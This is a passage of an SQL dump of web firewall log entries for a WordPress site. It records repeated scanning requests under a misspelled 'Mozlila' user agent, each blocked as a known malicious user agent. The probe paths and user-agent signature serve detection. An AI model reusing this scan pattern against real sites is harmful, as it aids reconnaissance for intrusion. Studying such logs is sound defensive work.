User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtaGVhZGVyLWltYWdlLXNldHRpbmcucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133487,1699888583.308305,1699888583.299600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-image-control.php','http://eckankar-colorado.org/wp-includes/customize/class-wp-customize-image-control.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtaW1hZ2UtY29udHJvbC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133311,1699888649.609203,1699888649.593900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/WordPress/wp-admin/includes/','http://eckankar-colorado.org/WordPress/wp-admin/includes/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L1dvcmRQcmVzcy93cC1hZG1pbi9pbmNsdWRlcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(133602,1699888538.946578,1699888538.938000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/load.php','http://eckankar-colorado.org/wp-includes/load.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2xvYWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133531,1699888565.982353,1699888565.955500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/IXR/class-IXR-client.php','http://eckankar-colorado.org/wp-includes/IXR/class-IXR-client.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lYUi9jbGFzcy1JWFItY2xpZW50LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133504,1699888575.960027,1699888575.951400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Sanitize.php','http://eckankar-colorado.org/wp-includes/SimplePie/Sanitize.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9TYW5pdGl6ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133492,1699888581.579324,1699888581.570400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-custom-css-setting.php','http://eckankar-colorado.org/wp-includes/customize/class-wp-customize-custom-css-setting.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtY3VzdG9tLWNzcy1zZXR0aW5nLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133498,1699888579.389962,1699888579.381100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-background-image-control.php','http://eckankar-colorado.org/wp-includes/customize/class-wp-customize-background-image-control.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtYmFja2dyb3VuZC1pbWFnZS1jb250cm9sLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134331,1700062291.644029,1700062291.634900,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/406.shtml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzQwNi5zaHRtbA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133521,1699888570.031621,1699888570.022400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Cache.php','http://eckankar-colorado.org/wp-includes/SimplePie/Cache.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9DYWNoZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133532,1699888565.631687,1699888565.622900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/IXR/class-IXR-base64.php','http://eckankar-colorado.org/wp-includes/IXR/class-IXR-base64.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lYUi9jbGFzcy1JWFItYmFzZTY0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134334,1700062273.695273,1700062273.685900,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/user/wp-login.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL3VzZXIvd3AtbG9naW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133522,1699888569.698465,1699888569.682000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Author.php','http://eckankar-colorado.org/wp-includes/SimplePie/Author.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9BdXRob3IucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134332,1700062285.479303,1700062285.465800,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/css/wp-login.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2Nzcy93cC1sb2dpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134333,1700062279.127592,1700062279.118300,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/admin.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvYWRtaW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133561,1699888554.182399,1699888554.173800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/template-canvas.php','http://eckankar-colorado.org/wp-includes/template-canvas.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3RlbXBsYXRlLWNhbnZhcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133564,1699888553.120420,1699888553.111700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/spl-autoload-compat.php','http://eckankar-colorado.org/wp-includes/spl-autoload-compat.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NwbC1hdXRvbG9hZC1jb21wYXQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133549,1699888558.585351,1699888558.576700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/wp-diff.php','http://eckankar-colorado.org/wp-includes/wp-diff.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dwLWRpZmYucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133299,1699888653.876716,1699888653.861500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/assets/','http://eckankar-colorado.org/assets/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Fzc2V0cy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(133249,1699888677.628206,1699888677.618600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sitemaps/providers/class-wp-sitemaps-users.php','http://eckankar-colorado.org/wp-includes/sitemaps/providers/class-wp-sitemaps-users.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NpdGVtYXBzL3Byb3ZpZGVycy9jbGFzcy13cC1zaXRlbWFwcy11c2Vycy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133244,1699888679.648168,1699888679.634400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/cekidot/','http://eckankar-colorado.org/cekidot/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Nla2lkb3Qv\",\"category\":\"brute-force\",\"ssl\":1}'),(133233,1699888683.572635,1699888683.557300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/limit/','http://eckankar-colorado.org/wp-content/plugins/limit/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9saW1pdC8=\",\"category\":\"brute-force\",\"ssl\":1}'),(133187,1699888480.865145,1699888480.843200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/category.php','http://eckankar-colorado.org/wp-includes/category.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NhdGVnb3J5LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133167,1699888487.902863,1699888487.875000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-ajax-response.php','http://eckankar-colorado.org/wp-includes/class-wp-ajax-response.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWFqYXgtcmVzcG9uc2UucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133186,1699888481.199001,1699888481.190200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-IXR.php','http://eckankar-colorado.org/wp-includes/class-IXR.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLUlYUi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133152,1699888493.326811,1699888493.317900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-classic-to-block-menu-converter.php','http://eckankar-colorado.org/wp-includes/class-wp-classic-to-block-menu-converter.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWNsYXNzaWMtdG8tYmxvY2stbWVudS1jb252ZXJ0ZXIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133615,1699888533.985149,1699888533.976500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/fonts.php','http://eckankar-colorado.org/wp-includes/fonts.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) 